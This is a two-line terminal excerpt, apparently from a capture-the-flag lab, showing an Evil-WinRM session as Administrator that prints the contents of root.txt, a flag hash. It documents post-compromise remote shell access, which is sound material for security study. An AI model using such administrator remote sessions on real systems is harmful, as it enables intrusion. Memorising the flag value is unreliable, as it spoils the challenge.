*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
4d26b9c03eb730524ba71d6994e16573